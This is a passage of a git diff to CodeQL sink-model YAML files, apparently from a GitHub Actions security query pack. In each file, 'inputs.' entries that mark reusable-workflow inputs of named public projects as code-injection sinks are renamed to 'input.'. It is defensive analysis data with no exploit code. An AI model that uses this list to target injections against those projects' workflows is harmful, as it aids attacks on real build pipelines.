"input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index cf69379583d..4dc3fc2bc98 100644 
--- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - 
["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 211fe546e28..52c4b4c7a24 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["decidim/decidim/.github/workflows/test_app.yml", "*", "inputs.test_command", "code-injection", "generated"] \ No newline at end of file + - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index d59258ce992..038f92a5317 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "inputs.release_number", "code-injection", "generated"] \ No newline at end of file + - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 43f5349bf3c..6fab83acf59 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "inputs.app-version", "code-injection", "generated"] \ No newline at end of file + - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index d6ef60a9698..238856cc7b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "inputs.test-script", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.test-script", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.display", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.matrix-jobs-count", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file + - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.display", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.matrix-jobs-count", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 1d41854bf71..71b584f5427 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml 
@@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.artifact-name", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.artifact-name", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.common-files", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.xml-dump-type-sizes", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.tests", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.docs", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.extras", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.stonesense", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.platform-files", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.launchdf", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.gcc-ver", "code-injection", "generated"] \ No newline at end of file + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.artifact-name", "code-injection", "generated"] + - 
["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.common-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.xml-dump-type-sizes", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.tests", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.docs", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.extras", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.stonesense", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.platform-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.launchdf", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.gcc-ver", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 9f64a59aead..1aa15482887 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.id", "code-injection", "generated"] - - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.type", "code-injection", "generated"] \ No newline at end of file + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 69cb39e5e55..89dd705f590 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index a66e2a2cca5..eb57c708bf5 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml 
@@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.TARGET_NAME", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.TEST_TARGET", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY_COMPOSE", "code-injection", "generated"] - - 
["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.TARGET_NAME", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.TEST_TARGET", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.SUDO", "code-injection", "generated"] + - 
["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BINARY_COMPOSE", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index ca3eeca8df7..048a753c553 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file + - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index b95ce03ed3a..739f6a546b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file + - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index 326d4391ecb..f6c2769caaf 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "inputs.solution", "code-injection", "generated"] \ No newline at end of file + - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 9f729879723..4d104c74c66 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.config", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.base-url", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.config", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.base-url", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index 835bbf4cf89..9f56abf2858 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] - - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 453c3cd06f3..8c73342d5fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "inputs.arch", "code-injection", "generated"] - - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.scenario", "code-injection", "generated"] - - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] - - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file + - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.scenario", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.testTimeout", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 32e6124c06e..87253d88224 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "inputs.container-runtime", "code-injection", "generated"] \ No newline at end of file + - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] + - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "input.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 09177714b08..9eb4c17cd3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "inputs.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file + - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 78243b4c6d7..860dcdcb43d 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.image-tag", "code-injection", "generated"] - - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.tag-suffix", "code-injection", "generated"] \ No newline at end of file + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index 6e69fb89fc8..539edcd5891 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "inputs.testScript", "code-injection", "generated"] \ No newline at end of file + - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index fee19d65a09..b1b37d967e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.aws_s3_cp_extra_args", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.s3_path", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.filter", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.filter", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.pypirc", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.cuda_short_version", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.torch_version", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "inputs.pre-script", "code-injection", "generated"] \ No newline at end of file + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.s3_path", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.artifact_tag", "code-injection", "generated"] + - 
["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.pypirc", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "input.cuda_short_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "input.torch_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "input.pre-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 51b58ab74f5..51691edc1f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.build_type", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.arch", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.bucket_suffix", "code-injection", "generated"] \ No newline at end of file + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "input.arch", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "input.bucket_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 